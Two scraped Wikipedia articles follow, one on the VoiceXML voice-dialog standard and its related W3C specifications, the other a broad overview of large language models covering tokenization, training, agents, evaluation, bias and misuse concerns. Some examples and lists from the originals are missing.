VoiceXML has tags that instruct thevoice browserto providespeech synthesis, automaticspeech recognition, dialog management, and audio playback. The following is an example of a VoiceXML document:
When interpreted by a VoiceXML interpreter this will output "Hello world" with synthesized speech.
Typically,HTTPis used as the transport protocol for fetching VoiceXML pages. Some applications may use static VoiceXML pages, while others rely on dynamic VoiceXML page generation using anapplication serverlikeTomcat,Weblogic,IIS, orWebSphere.
Historically, VoiceXML platform vendors have implemented the standard in different ways, and added proprietary features. But the VoiceXML 2.0 standard, adopted as a W3C Recommendation on 16 March 2004, clarified most areas of difference. The VoiceXML Forum, an industry group promoting the use of the standard, provides aconformance testingprocess that certifies vendors' implementations as conformant.
AT&T Corporation,IBM,Lucent, andMotorolaformed the VoiceXML Forum in March 1999, in order to develop a standard markup language for specifying voice dialogs. By September 1999 the Forum released VoiceXML 0.9 for member comment, and in March 2000 they published VoiceXML 1.0. Soon afterwards, the Forum turned over the control of the standard to the W3C.[1]The W3C produced several intermediate versions of VoiceXML 2.0, which reached the final "Recommendation" stage in March 2004.[2]
VoiceXML 2.1 added a relatively small set of additional features to VoiceXML 2.0, based on feedback from implementations of the 2.0 standard. It is backward compatible with VoiceXML 2.0 and reached W3C Recommendation status in June 2007.[3]
VoiceXML 3.0 was slated to be the next major release of VoiceXML, with new major features. However, with the disbanding of the VoiceXML Forum in May 2022,[4]the development of the new standard was scrapped.
As of December 2022, there are few VoiceXML 2.0/2.1 platform implementations being offered.
The W3C's Speech Interface Framework also defines these other standards closely associated with VoiceXML.
TheSpeech Recognition Grammar Specification(SRGS) is used to tell the speech recognizer what sentence patterns it should expect to hear: these patterns are called grammars. Once the speech recognizer determines the most likely sentence it heard, it needs to extract the semantic meaning from that sentence and return it to the VoiceXML interpreter. This semantic interpretation is specified via theSemantic Interpretation for Speech Recognition(SISR) standard. SISR is used inside SRGS to specify the semantic results associated with the grammars, i.e., the set of ECMAScript assignments that create the semantic structure returned by the speech recognizer.
TheSpeech Synthesis Markup Language(SSML) is used to decorate textual prompts with information on how best to render them in synthetic speech, for example which speech synthesizer voice to use or when to speak louder or softer.
ThePronunciation Lexicon Specification(PLS) is used to define how words are pronounced. The generated pronunciation information is meant to be used by both speech recognizers and speech synthesizers in voice browsing applications.
TheCall Control eXtensible Markup Language(CCXML) is a complementary W3C standard. A CCXML interpreter is used on some VoiceXML platforms to handle the initial call setup between the caller and the voice browser, and to provide telephony services like call transfer and disconnect to the voice browser. CCXML can also be used in non-VoiceXML contexts.
Inmedia serverapplications, it is often necessary for several call legs to interact with each other, for example in a multi-party conference. Some deficiencies were identified in VoiceXML for this application and so companies designed specific scripting languages to deal with this environment. TheMedia Server Markup Language(MSML) was Convedia's solution, andMedia Server Control Markup Language(MSCML) was Snowshore's solution. Snowshore is now owned by Dialogic and Convedia is now owned by Radisys. These languages also contain 'hooks' so that external scripts (like VoiceXML) can run on call legs whereIVRfunctionality is required.
There was an IETF working group calledmediactrl("media control") that was working on a successor for these scripting systems, which it is hoped will progress to an open and widely adopted standard.[5]The mediactrl working group concluded in 2013.[6]
|
https://en.wikipedia.org/wiki/VoiceXML
|
Alarge language model(LLM) is a type ofmachine learningmodeldesigned fornatural language processingtasks such as languagegeneration. LLMs arelanguage modelswith many parameters, and are trained withself-supervised learningon a vast amount of text.
The largest and most capable LLMs aregenerative pretrained transformers(GPTs). Modern models can befine-tunedfor specific tasks or guided byprompt engineering.[1]These models acquirepredictive powerregardingsyntax,semantics, andontologies[2]inherent in humanlanguage corpora, but they also inherit inaccuracies andbiasespresent in thedatathey are trained in.[3]
Before 2017, there were a few language models that were large as compared to capacities then available. In the 1990s, theIBM alignment modelspioneered statistical language modelling. A smoothedn-gram modelin 2001 trained on 0.3 billion words achieved state-of-the-artperplexityat the time.[4]In the 2000s, as Internet use became prevalent, some researchers constructed Internet-scale language datasets ("web as corpus"[5]), upon which they trained statistical language models.[6][7]In 2009, in most language processing tasks, statistical language models dominated over symbolic language models because they can usefully ingest large datasets.[8]
After neural networks became dominant in image processing around 2012,[9]they were applied to language modelling as well. Google converted its translation service toNeural Machine Translationin 2016. Because it preceded the existence oftransformers, it was done byseq2seqdeepLSTMnetworks.
At the 2017NeurIPSconference, Google researchers introduced the transformer architecture in their landmark paper "Attention Is All You Need". This paper's goal was to improve upon 2014 seq2seq technology,[10]and was based mainly on theattentionmechanism developed by Bahdanau et al. in 2014.[11]The following year in 2018,BERTwas introduced and quickly became "ubiquitous".[12]Though the original transformer has both encoder and decoder blocks, BERT is an encoder-only model. Academic and research usage of BERT began to decline in 2023, following rapid improvements in the abilities of decoder-only models (such as GPT) to solve tasks viaprompting.[13]
Although decoder-onlyGPT-1was introduced in 2018, it wasGPT-2in 2019 that caught widespread attention becauseOpenAIat first deemed it too powerful to release publicly, out of fear of malicious use.[14]GPT-3in 2020 went a step further and as of 2024[update]is available only viaAPIwith no offering of downloading the model to execute locally. But it was the 2022 consumer-facing browser-basedChatGPTthat captured the imaginations of the general population and caused some media hype and online buzz.[15]The 2023GPT-4was praised for its increased accuracy and as a "holy grail" for itsmultimodalcapabilities.[16]OpenAI did not reveal the high-level architecture and the number ofparametersof GPT-4. The release of ChatGPT led to an uptick in LLM usage across several research subfields of computer science, including robotics, software engineering, and societal impact work.[13]In 2024 OpenAI released the reasoning modelOpenAI o1, which generates long chains of thought before returning a final answer.
Competing language models have for the most part been attempting to equal the GPT series, at least in terms of number of parameters.[17]
Since 2022,source-availablemodels have been gaining popularity, especially at first withBLOOMandLLaMA, though both have restrictions on the field of use.Mistral AI's models Mistral 7B and Mixtral 8x7b have the more permissiveApache License. In January 2025,DeepSeekreleased DeepSeek R1, a 671-billion-parameter open-weight model that performs comparably to OpenAI o1 but at a much lower cost.[18]
Since 2023, many LLMs have been trained to bemultimodal, having the ability to also process or generate other types of data, such as images or audio. These LLMs are also called large multimodal models (LMMs).[19]
As of 2024, the largest and most capable models are all based on the transformer architecture. Some recent implementations are based on other architectures, such asrecurrent neural networkvariants andMamba(astate spacemodel).[20][21][22]
Asmachine learningalgorithms process numbers rather than text, the text must be converted to numbers. In the first step, a vocabulary is decided upon, then integer indices are arbitrarily but uniquely assigned to each vocabulary entry, and finally, anembeddingis associated to the integer index. Algorithms includebyte-pair encoding(BPE) andWordPiece. There are also special tokens serving ascontrol characters, such as[MASK]for masked-out token (as used inBERT), and[UNK]("unknown") for characters not appearing in the vocabulary. Also, some special symbols are used to denote special text formatting. For example, "Ġ" denotes a preceding whitespace in RoBERTa and GPT. "##" denotes continuation of a preceding word in BERT.[23]
For example, the BPE tokenizer used by GPT-3 (Legacy) would splittokenizer: texts -> series of numerical "tokens"as
Tokenization alsocompressesthe datasets. Because LLMs generally require input to be anarraythat is notjagged, the shorter texts must be "padded" until they match the length of the longest one. How many tokens are, on average, needed per word depends on the language of the dataset.[24][25]
As an example, consider a tokenizer based on byte-pair encoding. In the first step, all unique characters (including blanks andpunctuation marks) are treated as an initial set ofn-grams(i.e. initial set of uni-grams). Successively the most frequent pair of adjacent characters is merged into a bi-gram and all instances of the pair are replaced by it. All occurrences of adjacent pairs of (previously merged)n-grams that most frequently occur together are then again merged into even lengthiern-gram, until a vocabulary of prescribed size is obtained (in case ofGPT-3, the size is 50257).[26]After a tokenizer is trained, any text can be tokenized by it, as long as it does not contain characters not appearing in the initial-set of uni-grams.[27]
A token vocabulary based on the frequencies extracted from mainly English corpora uses as few tokens as possible for an average English word. However, an average word in another language encoded by such an English-optimized tokenizer is split into a suboptimal amount of tokens. GPT-2 tokenizer can use up to 15 times more tokens per word for some languages, for example for theShan languagefromMyanmar. Even more widespread languages such as Portuguese and German have "a premium of 50%" compared to English.[25]
Greedy tokenization also causes subtle problems with text completion.[28]
In the context of training LLMs, datasets are typically cleaned by removing low-quality, duplicated, or toxic data.[29]Cleaned datasets can increase training efficiency and lead to improved downstream performance.[30][31]A trained LLM can be used to clean datasets for training a further LLM.[32]
With the increasing proportion of LLM-generated content on the web, data cleaning in the future may include filtering out such content. LLM-generated content can pose a problem if the content is similar to human text (making filtering difficult) but of lower quality (degrading performance of models trained on it).[33]
Training of largest language models might need more linguistic data than naturally available, or that the naturally occurring data is of insufficient quality. In these cases, synthetic data might be used. Microsoft'sPhiseries of LLMs is trained on textbook-like data generated by another LLM.[34]
Reinforcement learning from human feedback(RLHF) through algorithms, such asproximal policy optimization, is used to further fine-tune a model based on a dataset of human preferences.[35]
Using "self-instruct" approaches, LLMs have been able tobootstrapcorrect responses, replacing any naive responses, starting from human-generated corrections of a few cases. For example, in the instruction "Write an essay about the main themes represented inHamlet," an initial naive completion might be "If you submit the essay after March 17, your grade will be reduced by 10% for each day of delay," based on the frequency of this textual sequence in the corpus.[36]
The largest LLM may be too expensive to train and use directly. For such models,mixture of experts(MoE) can be applied, a line of research pursued by Google researchers since 2017 to train models reaching up to 1 trillion parameters.[37][38][39]
Most results previously achievable only by (costly) fine-tuning, can be achieved throughprompt engineering, although limited to the scope of a single conversation (more precisely, limited to the scope of a context window).[40]
In order to find out which tokens are relevant to each other within the scope of the context window, the attention mechanism calculates "soft" weights for each token, more precisely for its embedding, by using multiple attention heads, each with its own "relevance" for calculating its own soft weights. For example, the small (i.e. 117M parameter sized)GPT-2model has had twelve attention heads and a context window of only 1k tokens.[42]In its medium version it has 345M parameters and contains 24 layers, each with 12 attention heads. For the training with gradient descent a batch size of 512 was utilized.[27]
The largest models, such as Google'sGemini 1.5, presented in February 2024, can have a context window sized up to 1 million (context window of 10 million was also "successfully tested").[43]Other models with large context windows includes Anthropic's Claude 2.1, with a context window of up to 200k tokens.[44]Note that this maximum refers to the number of input tokens and that the maximum number of output tokens differs from the input and is often smaller. For example, the GPT-4 Turbo model has a maximum output of 4096 tokens.[45]
Length of a conversation that the model can take into account when generating its next answer is limited by the size of a context window, as well. If the length of a conversation, for example withChatGPT, is longer than its context window, only the parts inside the context window are taken into account when generating the next answer, or the model needs to apply some algorithm to summarize the too distant parts of conversation.
The shortcomings of making a context window larger include higher computational cost and possibly diluting the focus on local context, while making it smaller can cause a model to miss an important long-range dependency. Balancing them is a matter of experimentation and domain-specific considerations.
A model may be pre-trained either to predict how the segment continues, or what is missing in the segment, given a segment from its training dataset.[46]It can be either
Models may be trained on auxiliary tasks which test their understanding of the data distribution, such as Next Sentence Prediction (NSP), in which pairs of sentences are presented and the model must predict whether they appear consecutively in the training corpus.[47]During training,regularizationloss is also used to stabilize training. However regularization loss is usually not used duringtestingand evaluation.
Substantial infrastructure is necessary for training the largest models.[48][49][50]
The qualifier "large" in "large language model" is inherently vague, as there is no definitive threshold for the number of parameters required to qualify as "large". As time goes on, what was previously considered "large" may evolve.GPT-1of 2018 is usually considered the first LLM, even though it has only 0.117 billion parameters. The tendency towards larger models is visible in thelist of large language models.
As technology advanced, large sums have been invested in increasingly large models. For example, training of the GPT-2 (i.e. a 1.5-billion-parameters model) in 2019 cost $50,000, while training of the PaLM (i.e. a 540-billion-parameters model) in 2022 cost $8 million, and Megatron-Turing NLG 530B (in 2021) cost around $11 million.[51]
For Transformer-based LLM, training cost is much higher than inference cost. It costs 6FLOPsper parameter to train on one token, whereas it costs 1 to 2 FLOPs per parameter to infer on one token.[52]
There are certain tasks that, in principle, cannot be solved by any LLM, at least not without the use of external tools or additional software. An example of such a task is responding to the user's input '354 * 139 = ', provided that the LLM has not already encountered a continuation of this calculation in its training corpus.[dubious–discuss]In such cases, the LLM needs to resort to running program code that calculates the result, which can then be included in its response.[dubious–discuss]: Another example is "What is the time now? It is ", where a separate program interpreter would need to execute a code to get system time on the computer, so that the LLM can include it in its reply.[53][54]This basic strategy can be sophisticated with multiple attempts of generated programs, and other sampling strategies.[55]
Generally, in order to get an LLM to use tools, one must fine-tune it for tool-use. If the number of tools is finite, then fine-tuning may be done just once. If the number of tools can grow arbitrarily, as with onlineAPIservices, then the LLM can be fine-tuned to be able to read API documentation and call API correctly.[56][57]
Retrieval-augmented generation(RAG) is another approach that enhances LLMs by integrating them withdocument retrievalsystems. Given a query, a document retriever is called to retrieve the most relevant documents. This is usually done by encoding the query and the documents into vectors, then finding the documents with vectors (usually stored in avector database) most similar to the vector of the query. The LLM then generates an output based on both the query and context included from the retrieved documents.[58]
An LLM is typically not anautonomous agentby itself, as it lacks the ability to interact with dynamic environments, recall past behaviors, and plan future actions, but can be transformed into one by integrating modules like profiling, memory, planning, and action.[59]
TheReAct pattern, a portmanteau of "Reason + Act", constructs anagentout of an LLM, using the LLM as a planner. The LLM is prompted to "think out loud". Specifically, the language model is prompted with a textual description of the environment, a goal, a list of possible actions, and a record of the actions and observations so far. It generates one or more thoughts before generating an action, which is then executed in the environment.[60]The linguistic description of the environment given to the LLM planner can even be the LaTeX code of a paper describing the environment.[61]
In the DEPS ("Describe, Explain, Plan and Select") method, an LLM is first connected to the visual world via image descriptions, then it is prompted to produce plans for complex tasks and behaviors based on its pretrained knowledge and environmental feedback it receives.[62]
The Reflexion method[63]constructs an agent that learns over multiple episodes. At the end of each episode, the LLM is given the record of the episode, and prompted to think up "lessons learned", which would help it perform better at a subsequent episode. These "lessons learned" are given to the agent in the subsequent episodes.[citation needed]
Monte Carlo tree searchcan use an LLM as rollout heuristic. When a programmatic world model is not available, an LLM can also be prompted with a description of the environment to act as world model.[64]
For open-ended exploration, an LLM can be used to score observations for their "interestingness", which can be used as a reward signal to guide a normal (non-LLM) reinforcement learning agent.[65]Alternatively, it canpropose increasingly difficult tasksforcurriculum learning.[66]Instead of outputting individual actions, an LLM planner can also construct "skills", orfunctionsfor complex action sequences. The skills can be stored and later invoked, allowing increasing levels of abstraction in planning.[66]
LLM-powered agents can keep a long-term memory of its previous contexts, and the memory can be retrieved in the same way as Retrieval Augmented Generation. Multiple such agents can interact socially.[67]
Typically, LLMs are trained with single- or half-precision floating point numbers (float32 and float16). One float16 has 16 bits, or 2 bytes, and so one billion parameters require 2 gigabytes. The largest models typically have 100 billion parameters, requiring 200 gigabytes to load, which places them outside the range of most consumer electronics.[68]
Post-trainingquantization[69]aims to decrease the space requirement by lowering precision of the parameters of a trained model, while preserving most of its performance.[70][71]The simplest form of quantization simply truncates all numbers to a given number of bits. It can be improved by using a different quantizationcodebookper layer. Further improvement can be done by applyingdifferent precisionsto different parameters, with higher precision for particularly important parameters ("outlier weights").[72]See the visual guide to quantization by Maarten Grootendorst[73]for a visual depiction.
While quantized models are typically frozen, and only pre-quantized models are fine-tuned, quantized models can still be fine-tuned.[74]
Multimodality means "having several modalities", and a"modality"refers to a type of input or output, such as video, image, audio, text,proprioception, etc.[75]There have been many AI models trained specifically to ingest one modality and output another modality, such asAlexNetfor image to label,[76]visual question answeringfor image-text to text,[77]andspeech recognitionfor speech to text.
A common method to create multimodal models out of an LLM is to "tokenize" the output of a trained encoder. Concretely, one can construct an LLM that can understand images as follows: take a trained LLM, and take a trained image encoderE{\displaystyle E}. Make a small multilayered perceptronf{\displaystyle f}, so that for any imagey{\displaystyle y}, the post-processed vectorf(E(y)){\displaystyle f(E(y))}has the same dimensions as an encoded token. That is an "image token". Then, one can interleave text tokens and image tokens. The compound model is then fine-tuned on an image-text dataset. This basic construction can be applied with more sophistication to improve the model. The image encoder may be frozen to improve stability.[78]
Flamingo demonstrated the effectiveness of the tokenization method, finetuning a pair of pretrained language model and image encoder to perform better on visual question answering than models trained from scratch.[79]Google PaLMmodel was fine-tuned into a multimodal model PaLM-E using the tokenization method, and applied to robotic control.[80]LLaMAmodels have also been turned multimodal using the tokenization method, to allow image inputs,[81]and video inputs.[82]
GPT-4can use both text and image as inputs[83](although the vision component was not released to the public until GPT-4V[84]);Google DeepMind'sGeminiis also multimodal.[85]Mistral introduced its own multimodal Pixtral 12B model in September 2024.[86]
In late 2024, a new direction emerged in LLM development with models specifically designed for complex reasoning tasks. These "reasoning models" were trained to spend more time generating step-by-step solutions before providing final answers, similar to human problem-solving processes.[87]OpenAI introduced this trend with theiro1model in September 2024, followed byo3in December 2024. These models showed significant improvements in mathematics, science, and coding tasks compared to traditional LLMs. For example, onInternational Mathematics Olympiadqualifying exam problems,GPT-4oachieved 13% accuracy while o1 reached 83%.[87][88]In January 2025, the Chinese company DeepSeek released DeepSeek-R1, a 671-billion-parameter open-weight reasoning model that achieved comparable performance to OpenAI's o1 while being significantly more cost-effective to operate. Unlike proprietary models from OpenAI, DeepSeek-R1's open-weight nature allowed researchers to study and build upon the algorithm, though its training data remained private.[89]These reasoning models typically require more computational resources per query compared to traditional LLMs, as they perform more extensive processing to work through problems step-by-step. However, they have shown superior capabilities in domains requiring structured logical thinking, such as mathematics, scientific research, and computer programming.[88]
Efforts to reduce or compensate for hallucinations have employedautomated reasoning, RAG (retrieval-augmented generation),fine-tuning, and other methods.[90]
The performance of an LLM after pretraining largely depends on the:
"Scaling laws" areempirical statistical lawsthat predict LLM performance based on such factors. One particular scaling law ("Chinchilla scaling") for LLM autoregressively trained for one epoch, with alog-loglearning rateschedule, states that:[91]{C=C0NDL=ANα+BDβ+L0{\displaystyle {\begin{cases}C=C_{0}ND\\[6pt]L={\frac {A}{N^{\alpha }}}+{\frac {B}{D^{\beta }}}+L_{0}\end{cases}}}where the variables are
and the statistical hyper-parameters are
Performance of bigger models on various tasks, when plotted on a log-log scale, appears as a linear extrapolation of performance achieved by smaller models. However, this linearity may be punctuated by "break(s)"[92]in the scaling law, where the slope of the line changes abruptly, and where larger models acquire "emergent abilities".[40][93]They arise from the complex interaction of the model's components and are not explicitly programmed or designed.[94]
Furthermore, recent research has demonstrated that AI systems, including large language models, can employ heuristic reasoning akin to human cognition. They balance between exhaustive logical processing and the use of cognitive shortcuts (heuristics), adapting their reasoning strategies to optimize between accuracy and effort. This behavior aligns with principles of resource-rational human cognition, as discussed in classical theories of bounded rationality and dual-process theory.[95]
One of the emergent abilities isin-context learningfrom example demonstrations.[96]In-context learning is involved in tasks, such as:
Schaefferet. al.argue that the emergent abilities are not unpredictably acquired, but predictably acquired according to asmooth scaling law. The authors considered a toy statistical model of an LLM solving multiple-choice questions, and showed that this statistical model, modified to account for other types of tasks, applies to these tasks as well.[102]
Letx{\displaystyle x}be the number of parameter count, andy{\displaystyle y}be the performance of the model.
Large language models by themselves areblack boxes, and it is not clear how they can perform linguistic tasks. Similarly, it is unclear if or how LLMs should be viewed as models of the human brain and/or human mind.[103]
Various techniques have been developed to enhance the transparency and interpretability of LLMs. Mechanistic interpretability aims toreverse-engineerLLMs by discovering symbolic algorithms that approximate the inference performed by an LLM. In recent years, sparse coding models such as sparse autoencoders, transcoders, and crosscoders have emerged as promising tools for identifying interpretable features.
Transcoders, which are more interpretable than transformers, have been utilized to develop “replacement models.” In one such study involving the mechanistic interpretation of writing a rhyming poem by an LLM, it was shown that although they are believed to simply predict the next token, they can, in fact, plan ahead.[104]
A related concept isAI explainability, which focuses on understanding how an AI model arrives at a given result. Techniques such as partial dependency plots, SHAP (SHapley Additive exPlanations), and feature importance assessments allow researchers to visualize and understand the contributions of various input features to the model's predictions. These methods help ensure that AI models make decisions based on relevant and fair criteria, enhancing trust and accountability.
By integrating these techniques, researchers and practitioners can gain deeper insights into the operations of LLMs, fostering trust and facilitating the responsible deployment of these powerful models.
In another example, the authors trained small transformers onmodular arithmetic addition. The resulting models were reverse-engineered, and it turned out they useddiscrete Fourier transform.[105]
NLP researchers were evenly split when asked, in a 2022 survey, whether (untuned) LLMs "could (ever) understand natural language in some nontrivial sense".[106]Proponents of "LLM understanding" believe that some LLM abilities, such as mathematical reasoning, imply an ability to"understand"certain concepts. A Microsoft team argued in 2023 that GPT-4 "can solve novel and difficult tasks that span mathematics, coding, vision, medicine, law, psychology and more" and that GPT-4 "could reasonably be viewed as an early (yet still incomplete) version of anartificial general intelligencesystem": "Can one reasonably say that a system that passes exams for software engineering candidates is notreallyintelligent?"[107][108]Ilya Sutskeverargues that predicting the next word sometimes involves reasoning and deep insights, for example if the LLM has to predict the name of the criminal in an unknown detective novel after processing the entire story leading up to the revelation.[109]Some researchers characterize LLMs as "alien intelligence".[110][111]For example, Conjecture CEOConnor Leahyconsiders untuned LLMs to be like inscrutable alien "Shoggoths", and believes that RLHF tuning creates a "smiling facade" obscuring the inner workings of the LLM: "If you don't push it too far, the smiley face stays on. But then you give it [an unexpected] prompt, and suddenly you see this massive underbelly of insanity, of weird thought processes and clearly non-human understanding."[112][113]
In contrast, some skeptics of LLM understanding believe that existing LLMs are "simply remixing and recombining existing writing",[111]a phenomenon known asstochastic parrot, or they point to the deficits existing LLMs continue to have in prediction skills, reasoning skills, agency, and explainability.[106]For example, GPT-4 has natural deficits in planning and in real-time learning.[108]Generative LLMs have been observed to confidently assert claims of fact which do not seem to bejustifiedby theirtraining data, a phenomenon which has been termed "hallucination".[114]Specifically, hallucinations in the context of LLMs correspond to the generation of text or responses that seem syntactically sound, fluent, and natural but are factually incorrect, nonsensical, or unfaithful to the provided source input.[115]NeuroscientistTerrence Sejnowskihas argued that "The diverging opinions of experts on the intelligence of LLMs suggests that our old ideas based on natural intelligence are inadequate".[106]
The matter of LLM's exhibiting intelligence or understanding has two main aspects – the first is how to model thought and language in a computer system, and the second is how to enable the computer system to generate human like language.[106]These aspects of language as a model ofcognitionhave been developed in the field ofcognitive linguistics. American linguistGeorge Lakoffpresented Neural Theory of Language (NTL)[116]as acomputational basisfor using language as a model of learning tasks and understanding.The NTL Modeloutlines how specific neural structures of the human brain shape the nature of thought and language and in turn what are the computational properties of such neural systems that can be applied to model thought and language in a computer system. After a framework for modeling language in a computer systems was established, the focus shifted to establishing frameworks for computer systems to generate language with acceptable grammar. In his 2014 book titledThe Language Myth: Why Language Is Not An Instinct, British cognitive linguist and digital communication technologistVyvyan Evansmapped out the role ofprobabilistic context-free grammar(PCFG) in enablingNLP to model cognitive patternsand generate human like language.[117][118]
The canonical measure of the performance of an LLM is itsperplexityon a given text corpus. Perplexity measures how well a model predicts the contents of a dataset; the higher the likelihood the model assigns to the dataset, the lower the perplexity. In mathematical terms, perplexity is the exponential of the average negative log likelihood per token.
log(Perplexity)=−1N∑i=1Nlog(Pr(tokeni∣context for tokeni)){\displaystyle \log({\text{Perplexity}})=-{\frac {1}{N}}\sum _{i=1}^{N}\log(\Pr({\text{token}}_{i}\mid {\text{context for token}}_{i}))}
Here,N{\displaystyle N}is the number of tokens in the text corpus, and "context for tokeni{\displaystyle i}" depends on the specific type of LLM. If the LLM is autoregressive, then "context for tokeni{\displaystyle i}" is the segment of text appearing before tokeni{\displaystyle i}. If the LLM is masked, then "context for tokeni{\displaystyle i}" is the segment of text surrounding tokeni{\displaystyle i}.
Because language models mayoverfitto training data, models are usually evaluated by their perplexity on atest set.[47]This evaluation is potentially problematic for larger models which, as they are trained on increasingly large corpora of text, are increasingly likely to inadvertently include portions of any given test set.[1]
Ininformation theory, the concept ofentropyis intricately linked to perplexity, a relationship notably established byClaude Shannon.[119]This relationship is mathematically expressed asEntropy=log2(Perplexity){\displaystyle {\text{Entropy}}=\log _{2}({\text{Perplexity}})}.
Entropy, in this context, is commonly quantified in terms of bits per word (BPW) or bits per character (BPC), which hinges on whether the language model utilizes word-based or character-based tokenization.
Notably, in the case of larger language models that predominantly employ sub-word tokenization, bits per token (BPT) emerges as a seemingly more appropriate measure. However, due to the variance in tokenization methods across different Large Language Models (LLMs), BPT does not serve as a reliable metric for comparative analysis among diverse models. To convert BPT into BPW, one can multiply it by the average number of tokens per word.
In the evaluation and comparison of language models,cross-entropyis generally the preferred metric over entropy. The underlying principle is that a lower BPW is indicative of a model's enhanced capability for compression. This, in turn, reflects the model's proficiency in making accurate predictions.
Benchmarksare used to evaluate LLM performance on specific tasks. Tests evaluate capabilities such as general knowledge, bias,commonsense reasoning, question answering, and mathematical problem-solving. Composite benchmarks examine multiple capabilities. Results are often sensitive to the prompting method.[120][121]
A question answering benchmark is termed "open book" if the model's prompt includes text from which the expected answer can be derived (for example, the previous question could be combined with text that includes the sentence "The Sharks have advanced to the Stanley Cup finals once, losing to the Pittsburgh Penguins in 2016."[122]). Otherwise, the task is considered "closed book", and the model must draw solely on its training.[123]Examples include GLUE, SuperGLUE,MMLU, BIG-bench, HELM, andHLE (Humanity's Last Exam).[119][123]
LLM bias may be assessed through benchmarks such as CrowS-Pairs (Crowdsourced Stereotype Pairs),[124]Stereo Set,[125]and Parity Benchmark.[126]
Fact-checking and misinformation detection benchmarks are available. A 2023 study compared the fact-checking accuracy of LLMs including ChatGPT 3.5 and 4.0, Bard, and Bing AI against independent fact-checkers such as PolitiFact and Snopes. The results demonstrated moderate proficiency, with GPT-4 achieving the highest accuracy at 71%, lagging behind human fact-checkers.[127]
An earlier standard tested using a portion of the evaluation dataset. It became more common to evaluate a pre-trained model directly through prompting techniques. Researchers vary in how they formulate prompts for particular tasks, particularly with respect to the number of correct examples attached to the prompt (i.e. the value ofninn-shot prompting).
Typical datasets consist of pairs of questions and correct answers, for example, ("Have the San Jose Sharks won the Stanley Cup?", "No").[122]Some examples of commonly used question answering datasets include TruthfulQA, Web Questions, TriviaQA, and SQuAD.[123]
Evaluation datasets may also take the form of text completion, having the model select the most likely word or sentence to complete a prompt, for example: "Alice was friends with Bob. Alice went to visit her friend, ____".[1]
Datasets are of varying quality and may contain questions that are mislabeled, ambiguous, unanswerable, or otherwise of low-quality.[128]
LLMs' rapid improvement regularly obsoletes benchmarks, with the models exceeding the performance of human annotators.[129]In addition, "shortcut learning" allows AIs to "cheat" on multiple-choice tests by using statistical correlations in superficial test question wording to guess the correct responses, without considering the specific question.[106]
Some datasets are adversarial, focusing on problems that confound LLMs. One example is the TruthfulQA dataset, a question answering dataset consisting of 817 questions that stump LLMs by mimicking falsehoods to which they were exposed during training. For example, an LLM may answer "No" to the question "Can you teach an old dog new tricks?" because of its exposure to the English idiomyou can't teach an old dog new tricks, even though this is not literally true.[130]
Another example of an adversarial evaluation dataset is Swag and its successor, HellaSwag, collections of problems in which one of multiple options must be selected to complete a text passage. The incorrect completions were generated by sampling from a language model. The resulting problems are trivial for humans but defeated LLMs. Sample questions:
We see a fitness center sign. We then see a man talking to the camera and sitting and laying on a exercise ball. The man...
BERTselects b) as the most likely completion, though the correct answer is d).[131]
In 2023,Nature Biomedical Engineeringwrote that "it is no longer possible to accurately distinguish" human-written text from text created by large language models, and that "It is all but certain that general-purpose large language models will rapidly proliferate... It is a rather safe bet that they will change many industries over time."[132]Goldman Sachssuggested in 2023 that generative language AI could increase global GDP by 7% in the next ten years, and could expose to automation 300 million jobs globally.[133][134]Brinkmann et al. (2023)[135]also argue that LLMs are transforming processes ofcultural evolutionby shaping processes of variation, transmission, and selection.
Memorization is an emergent behavior in LLMs in which long strings of text are occasionally output verbatim from training data, contrary to typical behavior of traditional artificial neural nets. Evaluations of controlled LLM output measure the amount memorized from training data (focused on GPT-2-series models) as variously over 1% for exact duplicates[136]or up to about 7%.[137]
A 2023 study showed that when ChatGPT 3.5 turbo was prompted to repeat the same word indefinitely, after a few hundreds of repetitions, it would start outputting excerpts from its training data.[138]
Some commenters expressed concern over accidental or deliberate creation of misinformation, or other forms of misuse.[139]For example, the availability of large language models could reduce the skill-level required to commit bioterrorism; biosecurity researcher Kevin Esvelt has suggested that LLM creators should exclude from their training data papers on creating or enhancing pathogens.[140]
The potential presence of "sleeper agents" within LLMs is another emerging security concern. These are hidden functionalities built into the model that remain dormant until triggered by a specific event or condition. Upon activation, the LLM deviates from its expected behavior to make insecure actions.[141]
LLM applications accessible to the public, like ChatGPT or Claude, typically incorporate safety measures designed to filter out harmful content. However, implementing these controls effectively has proven challenging. For instance, a 2023 study[142]proposed a method for circumventing LLM safety systems. In 2025, The American Sunlight Project, a non-profit, published a study[143]showing evidence that the so-calledPravda network, a pro-Russia propaganda aggregator, was strategically placing web content through mass publication and duplication with the intention of biasing LLM outputs. The American Sunlight Project coined this technique "LLM grooming," and pointed to it as a new tool of weaponizing AI to spread disinformation and harmful content.[143][144]Similarly,Yongge Wang[145]illustrated in 2024 how a potential criminal could potentially bypass ChatGPT 4o's safety controls to obtain information on establishing a drug trafficking operation. External filters, circuit breakers and overrides have been posed as solutions.[citation needed]
While LLMs have shown remarkable capabilities in generating human-like text, they are susceptible to inheriting and amplifying biases present in their training data. This can manifest in skewed representations or unfair treatment of different demographics, such as those based on race, gender, language, and cultural groups.[146]Since English data is overrepresented in current large language models' training data, it may also downplay non-English views.[147]
AI models can reinforce a wide range of stereotypes, including those based on gender, ethnicity, age, nationality, religion, or occupation. This can lead to outputs that homogenize, or unfairly generalize or caricature groups of people, sometimes in harmful or derogatory ways.[148][149]
Notably, gender bias refers to the tendency of these models to produce outputs that are unfairly prejudiced towards one gender over another. This bias typically arises from the data on which these models are trained. Large language models often assign roles and characteristics based on traditional gender norms.[146]For example, it might associate nurses or secretaries predominantly with women and engineers or CEOs with men.[150]
Selection bias refers the inherent tendency of large language models to favor certain option identifiers irrespective of the actual content of the options. This bias primarily stems from token bias—that is, the model assigns a higher a priori probability to specific answer tokens (such as “A”) when generating responses. As a result, when the ordering of options is altered (for example, by systematically moving the correct answer to different positions), the model’s performance can fluctuate significantly. This phenomenon undermines the reliability of large language models in multiple-choice settings.[151][152]
Political bias refers to the tendency of algorithms to systematically favor certain political viewpoints, ideologies, or outcomes over others. Language models may also exhibit political biases. Since the training data includes a wide range of political opinions and coverage, the models might generate responses that lean towards particular political ideologies or viewpoints, depending on the prevalence of those views in the data.[153]
The energy demands of LLMs have grown along with their size and capabilities.Data centersthat enable LLM training require substantial amounts of electricity. Much of that electricity is generated by non-renewable resources that create greenhouse gases and contribute toclimate change.[154]Nuclear powerandgeothermal energyare two options tech companies are exploring to meet the sizable energy demands of LLM training.[155]The significant expense of investing in geothermal solutions has led to major shale producers likeChevronandExxon Mobiladvocating for tech companies to use electricity produced vianatural gasto fuel their large energy demands.[156]
|
